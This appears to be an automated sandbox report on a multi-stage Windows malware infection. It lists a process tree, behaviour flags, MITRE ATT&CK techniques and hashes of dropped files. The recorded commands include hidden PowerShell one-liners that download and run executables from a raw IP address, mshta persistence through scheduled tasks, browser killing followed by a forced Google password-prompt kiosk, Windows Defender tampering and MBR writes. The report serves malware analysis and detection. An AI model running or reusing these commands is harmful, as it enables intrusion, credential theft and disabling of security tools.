- System Location Discovery: System Language Discovery
PID:2484 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:3772
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086920001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086920001\Bjkm5hE.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1940 -
C:\Users\Admin\AppData\Local\Temp\1086920001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086920001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1952
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 5564⤵
- Loads dropped DLL
- Program crash
PID:1892
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086921001\qFqSpAp.exe"C:\Users\Admin\AppData\Local\Temp\1086921001\qFqSpAp.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2120 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2120 -s 8244⤵
- Loads dropped DLL
- Program crash
PID:2568
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086922001\oVpNTUm.exe"C:\Users\Admin\AppData\Local\Temp\1086922001\oVpNTUm.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:2132
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1086923041\tYliuwV.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
C:\Users\Admin\AppData\Local\Temp\1086924001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1086924001\DTQCxXZ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2392
-
-
C:\Users\Admin\AppData\Local\Temp\1086925001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1086925001\7aencsM.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2648 -
C:\Users\Admin\AppData\Local\Temp\1086925001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1086925001\7aencsM.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1988
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 5564⤵
- Loads dropped DLL
- Program crash
PID:292
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086926001\3omTNLZ.exe"C:\Users\Admin\AppData\Local\Temp\1086926001\3omTNLZ.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2440
-
-
C:\Users\Admin\AppData\Local\Temp\1086927001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1086927001\d2YQIJa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1600
-
-
C:\Users\Admin\AppData\Local\Temp\1086928001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1086928001\Ta3ZyUR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2676 -
C:\Users\Admin\AppData\Local\Temp\1086928001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1086928001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 5604⤵
- Program crash
PID:1580
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086933101\dc86b89870.exe"C:\Users\Admin\AppData\Local\Temp\1086933101\dc86b89870.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2948 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn DaBQlmaudvb /tr "mshta C:\Users\Admin\AppData\Local\Temp\EoWitZcJH.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:2336 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn DaBQlmaudvb /tr "mshta C:\Users\Admin\AppData\Local\Temp\EoWitZcJH.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:3032
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\EoWitZcJH.hta4⤵
- Modifies Internet Explorer settings
PID:2460 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'A7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960 -
C:\Users\Admin\AppData\Local\TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE"C:\Users\Admin\AppData\Local\TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2488
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\1086934021\am_no.cmd" "3⤵PID:2952
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1086934021\am_no.cmd" any_word4⤵PID:1352
-
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2312
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵PID:2876
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:1324 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2124
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:1692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "OUmN9ma26lf" /tr "mshta \"C:\Temp\woGj13cqd.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1244
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\woGj13cqd.hta"5⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2964 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2172
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086944001\2266dcdb00.exe"C:\Users\Admin\AppData\Local\Temp\1086944001\2266dcdb00.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1236 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
PID:1556
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086945001\4536f7f1c3.exe"C:\Users\Admin\AppData\Local\Temp\1086945001\4536f7f1c3.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3388 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4016
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086946001\a1ba79af20.exe"C:\Users\Admin\AppData\Local\Temp\1086946001\a1ba79af20.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4020
-
-
C:\Users\Admin\AppData\Local\Temp\1086947001\4c71e9f822.exe"C:\Users\Admin\AppData\Local\Temp\1086947001\4c71e9f822.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:936
-
-
C:\Users\Admin\AppData\Local\Temp\1086948001\8f4c900399.exe"C:\Users\Admin\AppData\Local\Temp\1086948001\8f4c900399.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:3748 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 8044⤵
- Program crash
PID:3388
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086949001\3e5895c6d6.exe"C:\Users\Admin\AppData\Local\Temp\1086949001\3e5895c6d6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3960
-
-
C:\Users\Admin\AppData\Local\Temp\1086950001\dd0f37a968.exe"C:\Users\Admin\AppData\Local\Temp\1086950001\dd0f37a968.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2336
-
-
C:\Users\Admin\AppData\Local\Temp\1086951001\b463df2a29.exe"C:\Users\Admin\AppData\Local\Temp\1086951001\b463df2a29.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3112
-
-
C:\Users\Admin\AppData\Local\Temp\1086952001\eaa92bd248.exe"C:\Users\Admin\AppData\Local\Temp\1086952001\eaa92bd248.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2268 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3960
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:820
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:604
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:3092 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3092.0.1000302032\854539148" -parentBuildID 20221007134813 -prefsHandle 1240 -prefMapHandle 1232 -prefsLen 21028 -prefMapSize 233548 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a09593c-8c5c-4953-83ae-e7edc859b618} 3092 "\\.\pipe\gecko-crash-server-pipe.3092" 1304 145f6a58 gpu6⤵PID:3716
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3092.1.1809374142\703616909" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21889 -prefMapSize 233548 -appDir "C:\Program Files\Mozilla Firefox\browser" - {76983395-779f-4142-9146-c40c2386ae72} 3092 "\\.\pipe\gecko-crash-server-pipe.3092" 1520 e72758 socket6⤵PID:3164
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3092.2.483492727\1102700262" -childID 1 -isForBrowser -prefsHandle 1820 -prefMapHandle 1720 -prefsLen 21992 -prefMapSize 233548 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3fe449f-b9a4-40f7-8afc-b8fa19768b3a} 3092 "\\.\pipe\gecko-crash-server-pipe.3092" 1684 1a8fcc58 tab6⤵PID:4028
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3092.3.276655168\546350959" -childID 2 -isForBrowser -prefsHandle 2592 -prefMapHandle 2588 -prefsLen 26340 -prefMapSize 233548 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac6d6ce5-f144-4da0-832a-3fabf4fd49dc} 3092 "\\.\pipe\gecko-crash-server-pipe.3092" 2604 e64b58 tab6⤵PID:3744
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3092.4.842921909\173296409" -childID 3 -isForBrowser -prefsHandle 3364 -prefMapHandle 3520 -prefsLen 26340 -prefMapSize 233548 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {60eed950-bd31-4c5e-8df6-b8330446a0c9} 3092 "\\.\pipe\gecko-crash-server-pipe.3092" 3536 20b88158 tab6⤵PID:1920
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3092.5.881231077\1009590943" -childID 4 -isForBrowser -prefsHandle 3652 -prefMapHandle 3656 -prefsLen 26340 -prefMapSize 233548 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe577ada-e306-4369-bd8c-4849c3dcccf5} 3092 "\\.\pipe\gecko-crash-server-pipe.3092" 3640 20b8a258 tab6⤵PID:1980
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3092.6.127137462\1644947726" -childID 5 -isForBrowser -prefsHandle 3824 -prefMapHandle 3828 -prefsLen 26340 -prefMapSize 233548 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5215c6d-9b88-4937-b1ef-3f86d38fa3d2} 3092 "\\.\pipe\gecko-crash-server-pipe.3092" 3808 20b88458 tab6⤵PID:1996
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086953001\50f96f9f6a.exe"C:\Users\Admin\AppData\Local\Temp\1086953001\50f96f9f6a.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2140 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn bvDFimasxCU /tr "mshta C:\Users\Admin\AppData\Local\Temp\M1KQZUaok.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:2484 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn bvDFimasxCU /tr "mshta C:\Users\Admin\AppData\Local\Temp\M1KQZUaok.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2996
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\M1KQZUaok.hta4⤵
- Modifies Internet Explorer settings
PID:3080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QJPENE5TXEJ5PUKIDGBVIYCZATRXK8PX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2124 -
C:\Users\Admin\AppData\Local\TempQJPENE5TXEJ5PUKIDGBVIYCZATRXK8PX.EXE"C:\Users\Admin\AppData\Local\TempQJPENE5TXEJ5PUKIDGBVIYCZATRXK8PX.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2640
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086954001\3b959cc017.exe"C:\Users\Admin\AppData\Local\Temp\1086954001\3b959cc017.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
PID:3960
-
-
C:\Users\Admin\AppData\Local\Temp\1086955001\96cd7a6a36.exe"C:\Users\Admin\AppData\Local\Temp\1086955001\96cd7a6a36.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1800
-
-
C:\Users\Admin\AppData\Local\Temp\1086956001\57eec1646c.exe"C:\Users\Admin\AppData\Local\Temp\1086956001\57eec1646c.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:2132
-
-
C:\Users\Admin\AppData\Local\Temp\1086957001\c5845c87f3.exe"C:\Users\Admin\AppData\Local\Temp\1086957001\c5845c87f3.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2348
-
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:2156
-
C:\Windows\system32\taskeng.exetaskeng.exe {B9B6B855-43BC-4B1E-ABAE-FE65D6BC39A9} S-1-5-21-3290804112-2823094203-3137964600-1000:VORHPBAB\Admin:Interactive:[1]1⤵PID:2800
-
C:\ProgramData\rjbr\bovjd.exeC:\ProgramData\rjbr\bovjd.exe start22⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1732
-
-
C:\ProgramData\hsfrhep\gmsbuho.exeC:\ProgramData\hsfrhep\gmsbuho.exe start22⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2540
-
-
C:\ProgramData\hsfrhep\gmsbuho.exeC:\ProgramData\hsfrhep\gmsbuho.exe start22⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1804
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Modify Authentication Process
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
8Pre-OS Boot
1Bootkit
1Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
5Credentials In Files
5Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD50d7b0d5363dd2dbd02e7b9bae07ae1c3
SHA19f40a6c6728ff97ded6c63967d8c60789b90879f
SHA2565edf98ba02d2dd25dadff5a8acb1cd2b250e6565f227448a04be4f8d8ca176b3
SHA512fb9147eab321731ae65bc5fefda7871e4e8ef4bcda3afb61359a8ae57f5b0e0167847c8055d204b73f93f87a5d71c389ca226a235111274381fc2246e1062e34
-
Filesize
16B
MD518e723571b00fb1694a3bad6c78e4054
SHA1afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA2568af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA51243bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
236KB
MD52ecb51ab00c5f340380ecf849291dbcf
SHA11a4dffbce2a4ce65495ed79eab42a4da3b660931
SHA256f1b3e0f2750a9103e46a6a4a34f1cf9d17779725f98042cc2475ec66484801cf
SHA512e241a48eafcaf99187035f0870d24d74ae97fe84aaadd2591cceea9f64b8223d77cfb17a038a58eadd3b822c5201a6f7494f26eea6f77d95f77f6c668d088e6b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EB0KZ1Y4\service[1].htm
Filesize1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZOGPI1N2\soft[1]
Filesize987KB
MD5f49d1aaae28b92052e997480c504aa3b
SHA1a422f6403847405cee6068f3394bb151d8591fb5
SHA25681e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA51241f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\activity-stream.discovery_stream.json.tmp
Filesize33KB
MD5910f5d6b849eb02c835f3200a35c86d7
SHA1a040849400713fe93c4f8b0ae2ec805ce53ee05c
SHA2562d43ad33e42a46d587169a516e86de0555bc940feedc3c2375e97ba69c3248c8
SHA512810acd4536162ac9b6166cf78bfd51677e7219a5f07ca050ec7090b563c828b0f1a6b2dd5010e1d587520bdf2accff7dacae92d4c312c57146b4190ed1a0db17
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
